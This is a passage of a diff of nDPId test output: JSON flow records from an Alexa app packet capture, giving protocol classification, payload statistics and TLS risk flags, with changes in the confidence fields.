+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041150,"flow_last_seen":1490976041151,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":54886,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976177116,"flow_last_seen":1490976177850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6576,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976177116,"flow_last_seen":1490976187290,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9507,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976195547,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976177276,"flow_last_seen":1490976187754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12795,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976186164,"flow_last_seen":1490976186790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5152,"flow_avg_l4_payload_len":303,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976134140,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13897,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":59,"flow_first_seen":1490976134141,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31504,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976134144,"flow_last_seen":1490976135402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12573,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134146,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14135,"flow_avg_l4_payload_len":504,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1490976134148,"flow_last_seen":1490976135505,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15689,"flow_avg_l4_payload_len":506,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976134149,"flow_last_seen":1490976135403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14785,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1490976139642,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":29286,"flow_avg_l4_payload_len":574,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51992,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1490976139643,"flow_last_seen":1490976140772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12822,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976139643,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8213,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30483,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 